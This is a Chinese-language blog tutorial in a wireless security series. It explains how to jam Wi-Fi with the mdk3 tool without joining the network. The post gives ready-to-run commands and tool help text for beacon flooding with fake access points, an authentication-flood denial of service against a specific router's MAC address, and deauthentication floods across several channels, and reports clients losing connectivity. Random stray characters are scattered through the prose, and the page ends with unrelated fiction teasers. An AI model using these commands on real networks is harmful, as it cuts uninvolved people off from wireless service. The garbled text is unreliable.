無線安全專題_攻擊篇--干擾通信

中秋節(jié)玩的比較嗨炭序,無線安全專題的文章就拖沓了一下啤覆,見諒見諒。惭聂。窗声。上篇講解了無線安全專題_破解篇03--打造個人字典,有感興趣的朋友給我私信辜纲,還有在公眾號中給我留言說笨觅,希望我講解一下彩虹表和GPU破解的事情,所以我為了響應(yīng)大家的需求耕腾,我之后會在破解篇中再增加一篇專門講解彩虹表和GPU破解的問題见剩。今天咱們就開啟無線安全專題下一篇:攻擊篇。攻擊篇主要分為兩個部分:一個是不連接上無線下的攻擊扫俺,一個是連接上無線下的攻擊苍苞。本次講解的就是如何在不連接無線的情況下進(jìn)行攻擊(僅僅是討論技術(shù),切不要進(jìn)行惡意使用)狼纬,主要使用的工具是kali下面的mdk3羹呵。(我的新書《Python爬蟲開發(fā)與項目實(shí)戰(zhàn)》發(fā)布了,大家在這里可以看到樣章


  
一.偽造大量的死亡AP信號疗琉,干擾通信
  首先咱們將無線網(wǎng)卡切換到監(jiān)聽模式(怎么切換的冈欢,請看我之前寫的文章),偽造大量的AP信號使用的是mdk3的b參數(shù)没炒。
b - Beacon Flood Mode
Sends beacon frames to show fake APs at clients.
This can sometimes crash network scanners and even drivers!
OPTIONS:
-n <ssid>   Use SSID <ssid> instead of randomly generated ones 給AP信號指定名稱,不使用就隨機(jī)生成
-f <filename>  Read SSIDs from file 可以從文件中讀取AP名稱
-v <filename>  Read MACs and SSIDs from file. See example file! 可以從文件中讀取ap mac和名稱
-d  Show station as Ad-Hoc 自定義為Ad-Hoc模式

-w  Set WEP bit (Generates encrypted networks) 自定義為wep加密
-g  Show station as 54 Mbit 自定義為54M模式
-t  Show station using WPA TKIP encryption 自定義為wpa TKIP 加密
-a  Show station using WPA AES encryption 自定義為wpa AES 加密
-m  Use valid accesspoint MAC from OUI database 讀取數(shù)據(jù)庫中的mac
-h  Hop to channel where AP is spoofed涛癌。This makes the test more effective against some devices/drivers。But it reduces packet rate due to channel hopping.
-c <chan>   Fake an AP on channel <chan>. If you want your card to hop onl, this channel, you have to set -h option, too! 自定義信道
-s <pps>  Set speed in packets per second (Default: 50) 自定義發(fā)包速率

1.1 偽造一個名稱為為qiye1送火,信道為1,發(fā)包速率為200的AP信號
    mdk3 wlan1 b -n qiye1 -c 1 -p 200

1.2 偽造一個名稱為為qiye1先匪,信道為1种吸,發(fā)包速率為200,加密方式為wpa AES的AP信號

mdk3 wlan1 b -n qiye1 -c 1 -p 200 -a

從手機(jī)上可以看到qiye1這個信號是加密的呀非。

  

1.3 根據(jù)文件中的名稱偽造AP信號坚俗,信道為2镜盯。

mdk3 wlan1 b -f FakeAPName.txt -c 2

執(zhí)行完成后,在電腦上可以看到下圖的效果,顯示了我自定義文件中的AP名稱:



1.4 隨機(jī)偽造大量ap信號猖败,信道為1
    mdk3 wlan1 b -g -c 1

電腦上會顯示各種亂七八糟命名的無線信號速缆,填滿整個無線列表。

二.驗證洪水攻擊方式恩闻,干擾通信艺糜,甚至可以干掉無線路由。

mdk3自動模擬隨機(jī)產(chǎn)生的mac向目標(biāo)AP發(fā)起大量驗證請求幢尚,可以導(dǎo)致AP忙于處理過多的請求而停止對正常連接客戶端的響應(yīng)破停,這個可以用來強(qiáng)迫用戶重啟路由。

a - Authentication DoS mode
Sends authentication frames to all APs found in range.
Too much clients freeze or reset almost every AP.
OPTIONS:
-a <ap_mac>  Only test the specified AP 攻擊目標(biāo)AP的mac尉剩,可以看之前的欺騙篇真慢,可以知道怎么回去ap mac
-m  Use valid client MAC from OUI database 使用數(shù)據(jù)庫中mac
-c  Do NOT check for test being successful 不檢測測試是否成功
-i <ap_mac>  Perform intelligent test on AP (-a and -c will be ignored) 智能測試This test connects clients to the AP and reinjects sniffed data to keep them alive
-s <pps>  Set speed in packets per second (Default: unlimited) 發(fā)包速率

攻擊名稱為qiye,mac地址為FC:D7:33:DE:F3:8A的無線AP理茎。

mdk3 wlan1 a -a FC:D7:33:DE:F3:8A -c -s 300

發(fā)起攻擊后黑界,一直處于連接狀態(tài),直到超時皂林。手機(jī)也是這種情況朗鸠,點(diǎn)擊連接后沒有什么反應(yīng)。

三.強(qiáng)制解除驗證洪水攻擊方式式撼。

在這種模式下童社,軟件會想周圍所有的AP發(fā)送強(qiáng)制解除驗證數(shù)據(jù)包,迫使所有連接上AP的客戶端掉線著隆,無響應(yīng)扰楼。

d - Deauthentication / Disassociation Amok Mode
Kicks everybody found from AP
OPTIONS:
-w <filename>  Read file containing MACs not to care about (Whitelist mode) 指定白名單mac
-b <filename>  Read file containing MACs to run test on (Blacklist Mode) 指定mac黑名單
-s <pps>  Set speed in packets per second (Default: unlimited) 發(fā)包速率
-c [chan,chan,chan,...]  Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.指定信道,可以用逗號分隔多個信道

3.1 攻擊名稱為qiye美浦,mac地址為FC:D7:33:DE:F3:8A的無線AP,使我客戶端掉線無法上網(wǎng)弦赖。

mdk3 wlan1 d -b blacklist.txt


電腦掉線之后重新連接,發(fā)現(xiàn)已經(jīng)連不上了浦辨。



3.2 直接按照信道進(jìn)行全范圍攻擊

直接將我掃描到的所有信道進(jìn)行攻擊蹬竖。
    mdk3 wlan1 d -c 6,11,4,3,13,7

今天的分享就到這里,下一篇繼續(xù)分析流酬。如果大家覺得還可以呀币厕,記得推薦呦。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末芽腾,一起剝皮案震驚了整個濱河市旦装,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌摊滔,老刑警劉巖阴绢,帶你破解...
    沈念sama閱讀 206,482評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件店乐,死亡現(xiàn)場離奇詭異,居然都是意外死亡呻袭,警方通過查閱死者的電腦和手機(jī)眨八,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,377評論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來左电,“玉大人廉侧,你說我怎么就攤上這事∪唬” “怎么了伏穆?”我有些...
    開封第一講書人閱讀 152,762評論 0 342
  • 文/不壞的土叔 我叫張陵,是天一觀的道長纷纫。 經(jīng)常有香客問我枕扫,道長,這世上最難降的妖魔是什么辱魁? 我笑而不...
    開封第一講書人閱讀 55,273評論 1 279
  • 正文 為了忘掉前任烟瞧,我火速辦了婚禮,結(jié)果婚禮上染簇,老公的妹妹穿的比我還像新娘参滴。我一直安慰自己,他們只是感情好锻弓,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,289評論 5 373
  • 文/花漫 我一把揭開白布砾赔。 她就那樣靜靜地躺著,像睡著了一般青灼。 火紅的嫁衣襯著肌膚如雪暴心。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,046評論 1 285
  • 那天杂拨,我揣著相機(jī)與錄音专普,去河邊找鬼。 笑死弹沽,一個胖子當(dāng)著我的面吹牛檀夹,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播策橘,決...
    沈念sama閱讀 38,351評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼炸渡,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了丽已?” 一聲冷哼從身側(cè)響起偶摔,我...
    開封第一講書人閱讀 36,988評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎促脉,沒想到半個月后辰斋,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,476評論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡瘸味,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,948評論 2 324
  • 正文 我和宋清朗相戀三年宫仗,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片旁仿。...
    茶點(diǎn)故事閱讀 38,064評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡藕夫,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出枯冈,到底是詐尸還是另有隱情毅贮,我是刑警寧澤,帶...
    沈念sama閱讀 33,712評論 4 323
  • 正文 年R本政府宣布尘奏,位于F島的核電站滩褥,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏炫加。R本人自食惡果不足惜瑰煎,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,261評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望俗孝。 院中可真熱鬧酒甸,春花似錦、人聲如沸赋铝。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,264評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽革骨。三九已至农尖,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間苛蒲,已是汗流浹背卤橄。 一陣腳步聲響...
    開封第一講書人閱讀 31,486評論 1 262
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留臂外,地道東北人窟扑。 一個月前我還...
    沈念sama閱讀 45,511評論 2 354
  • 正文 我出身青樓,卻偏偏與公主長得像漏健,于是被迫代替她去往敵國和親嚎货。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,802評論 2 345

推薦閱讀更多精彩內(nèi)容